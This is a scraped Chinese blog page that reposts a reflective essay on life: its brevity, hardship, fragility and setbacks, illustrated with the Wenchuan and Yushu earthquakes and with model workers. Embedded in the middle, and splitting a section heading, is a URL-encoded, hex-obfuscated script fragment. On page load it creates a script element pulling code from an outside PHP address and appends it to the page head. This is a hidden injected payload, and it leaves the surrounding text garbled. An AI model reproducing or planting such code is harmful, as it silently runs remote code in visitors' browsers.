注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

美丽人生

我喜欢小朋友,与我的教师生涯有关。禾秀博客

 
 
 

日志

 
 
关于我

坦诚明白地沟通对每一个有关的人都有好处,所以,坦诚做人、坦然面对,顺其自然最好。

网易考拉推荐

【转载】【原创】漫话人生  

2013-04-07 15:57:56|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文转载自胜利在望《【原创】漫话人生》

     关于人生,这是几千年来人们一直谈论的话题。人们经常这样说:人生是一个穷人和富人、好人和坏人演绎的故事;人生是一本内涵丰富、包罗万象的洋洋巨著;人生是人们实践着、研究着、创造着的一项浩大工程;人生是一首无论曲谱怎样、声调如何都得坚持唱完的自由之歌;人生是一场以感情为主题、以生活和事业为剧情的大本戏;人生是一道需要认真思考、费心求解的方程式;人生是一次长途旅行,可又饱览美景的喜悦、也有登山跋涉的艰辛;人生是一根蜡烛,无论如何也得燃烧净尽;人生是一杯浓酒,经过生活的酿造才会有滋有味;人生是一场梦,无论是美好还是恶丑都得苏醒;人生是一道风景,有的亮丽光彩有的灰暗无色;人生是一条路,是一条不归路,不管是平坦坎坷,还是笔直曲折,任凭雨暴风狂、浪涛惊天,都得顶风搏浪、勇往直前、永不回头!

                                                        

╰☆oО分割线☆oО

 

网友贴图

       人生短暂而又漫长:人的一生有长有短,时间对每一个人来说都是公平的。人们通常比喻说人生如梦、如云、如烟、如箭;岁月如流、光阴如梭、人生几何;人生一世,草木一秋等等。人生时间屈指可数,最多三万个日出日落,百十个春夏秋冬。当一个人在办退休的时候,方感觉这60年过得出奇的快,时光不声不响、悄无声息地从身边流逝,感慨万分长叹人生短暂啊!

       从时间上来说,人生的确是短暂的。说人生漫长,那纯粹是从感觉上和心情上来说的。当一个人生活艰苦、工作不顺心或被疾病折磨时,就会感觉度日如年,时光漫长。当苦日子熬过头,心情舒畅时再回忆过去,就感觉几天也是一会儿,几十年也是一眨眼。平时等人等事是最急人的事情,会觉得一分一秒都十分漫长。整天逍遥自在无所事事的人会感觉时间太长。一天忙忙碌碌奔波不停的人,则会觉得时间过得很快。人们在工作不满意,恋爱受挫折,生活过的累,欲望达不到,身体有毛病等情况时,总会埋怨时间走得太慢,人生太得漫长。

      人生虽然短暂,但要活得精彩。人生的价值在于追求,应该心怀梦想,树立目标,勇敢奋斗,不向命运低头,不向困难屈服,创造美好前程。人生如此短暂,珍惜时间,珍惜生命,享受生活网友贴图

      人生辛苦而又快乐:一个人自从呱呱坠地,带着一颗心而来;直到撒手人寰,不带一根草而去,这中间的过程,经历了多少艰辛,度过了多少苦难谁人能够知晓!?上学、工作或劳动、结婚生子、老去。尤其人到中年,上有老下有小,拼命工作劳动,辛苦养育儿女,尽心赡养父母,女人还要增加更多苦难。日子不好过,滋味不好受。真是人生酸甜苦辣咸五味赏全,悲欢离合、恩怨情仇尽得阅历。

      并不是每个人的人生都是辛苦的,也并不是每个人的人生都始终是辛苦的。少部分人可能一直一帆风顺,但大部分人却都要经历艰苦的过程。这中间有命运的安排,也有机遇的把握。

      人生的辛苦与快乐完全在于自己。各人的命运由各人掌握。快乐和幸福需要自己亲手去创造。除了工作和生活本身带来的辛苦之外,主要的“苦”都是自造的。源于欲望、攀比、抱怨、甚至仇恨。其实生气和怨恨是一种消极无能的表现。那是用别人的缺点或环境因素来惩罚和折磨自己。一个人要得到快乐,就必须改变自我,战胜自己。懂得使自己逐渐适应社会,而不是让社会适应自己。真正的快乐不是因为得到的多,而是因为计较的少。欲而不知足则失其所欲,有而不知止则失其所有。在奉献和感恩中享受快乐,在艰苦奋斗中享受快乐。含泪播种的人,一定能含笑收获!

                  网友贴图

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<      人生脆弱而又坚强【原创】漫话人生 - 胜利在望 - 欢迎朋友到【老年会所】参观指导!cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">:人是一个鲜活的生命,身体本身是十分脆弱的。人的生命可以很短,甚至可以不见天日在胎内窒息而亡。几千年来,从古到今,因战争、灾难、瘟疫死亡的人无法统计。不说远的,就拿近几年来说,2008年5.12四川汶川8级大地震,遇难人数超过8万,受伤人员374171人。2010年4.14甘肃玉树7.1级地震又有2183人遇难,12135人受伤。自然灾害使多少鲜活生命瞬间消失,使多少完整的人即刻变成伤残!当今社会车祸、疾病、水火灾害也会轻易地夺走人们的性命,这是多么地残酷无情!

      时代先锋任长霞在执行任务途中因车祸而失去生命,年仅40岁。时代先锋王瑛身患肝癌,在47岁年龄上被病魔夺走了宝贵生命。在各条战线上英年早逝的英雄模范人物还有很多,被白血病及车祸等夺去生命的孩子们也还有很多。人的生命竟是那样的脆弱,连那些肉眼都看不见,用手也摸不着的细菌和病毒,也把人搞得五脏惶惶、六腑凄凄。有时即使不要人命,也成了个残疾。人啊,真的脆弱呀!

      生命脆弱这是人的生理本性。而人正是由于这种生理脆弱,从而产生了无比的坚强!人们用坚强同脆弱与短暂作斗争,保护生命,延长生命,创造奇迹!

     汶川和玉树发生地震,一方有难八方支援,举国捐助,为死难同胞祈福,为受难同胞加油,重建美好家园。表现了全国人民的大爱精神,体现出震区人民的坚强不屈。

      我国首席导弹专家邱成龙在肺癌晚期,仍为国防科技事业而呕心沥血。被查出肺癌晚期,生命的最后8个月,他指导同事整理了上百份重要科研资料,完成了《第二炮兵导弹作战运用》教材的最后修订。英年早逝的四川南江县纪委书记王瑛,病重期间仍然带病指挥灾民抗震救灾,人们都用这个字来描述她:坚强!伟大的中国人民,就是一个勤劳勇敢的民族,几千年来与天斗、与地斗、与各种敌人斗,才换来今天富强和美丽的新中国。我们还要继续努力奋斗,创造更加美好的明天!

                网友贴图

      人生平坦而又坎坷:人来到世间就是来吃苦的,不是来享福的。人生的道路注定不平坦,不会一帆风顺。对个别人而言,可能会有高铁高速路,但那可能会是一段而不是全程。平坦一般是暂时性的阶段性的,坎坷通常是长期的整体的。

      生长在富家的孩子,小时候享受优裕的生活、良好的教育,长大后又可以安排到满意的工作。然而以后的路就基本上要靠自己了。常言说,富不过三代。自己如果没本事,又缺乏吃苦精神,那将会是很惨的。

      人生可能会遭遇许多种天灾人祸,比如:地震、洪涝、火患、婚变、事故、疾病等等。生活有时是温柔善良的,有时又是冷酷无情的。有时是良师益友,有时又是妖魔鬼怪。在走平坦路,处于顺境时,切勿骄傲自大、忘乎所以;要知道居安思危,记住感恩戴德。走坎坷路,处于逆境时,切勿灰心丧气、怨天尤人;要懂得汲取教训,记住振奋精神。人生之路既有风和日丽、风平浪静,也有乌云密布、惊涛骇浪;既有一路鲜花的欢声笑语,也有满地荆棘的痛苦煎熬。人生的坎坷,可以磨练、造就一个人;也可以击垮、毁灭一个人。每一次的跌倒、失败,其实是取得了经验,获得了财富。对于坎坷、挫折,只有勇敢面对,迎难而上,不逃避、不埋怨、不自卑、不轻敌。生命的质量会因跌倒而厚重,会因奋斗而精彩!

                        ╰☆oО分割线☆oО                  

       人生最大的愿望就是幸福和快乐。其实这两样东西很容易得到。富人能有,穷人也能有;顺境中可有,逆境中也可以有。关键是不可强求、不可贪婪。自己要善于把握,善于感受。

       常有人感叹:人活这一生真难啊!人这一生有长有短,有苦有甜,有平直有坎坷,有脆弱有坚强。有的人事业有成,人生五彩斑斓;有的人事业无成,人生灰白无色。过去的日子不要再耿耿于怀,忘掉过去,珍惜现在,展望明天。必须努力学习,不断充实自己,赶上时代前进的步伐,不断地奋斗,让自己的人生开放出更加鲜艳的花朵!

 ╰☆oО分割线☆oО

 
201.9.29
木青 对我的日志《【原创】漫话人生》评论道

自然的自生、老、病、死,已经让我们感慨颇多,而当天灾人祸降临时,人的生命就更显渺小了。大到那场让我们记忆犹新的地震,小到一次车祸,都可以轻易地捻灭许多生命之火。而人的生命轨迹又实在无迹可循,一百个人就有一百个活法。人总是在不同的时间和空间里追寻着什么,但是,人的一生所拥有的时间和空间又是那么有限,而且难测,故我想,生命之路既然是一条不归路,我们只要多重视生命的过程就是了。


 

  评论这张
 
阅读(95)| 评论(8)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017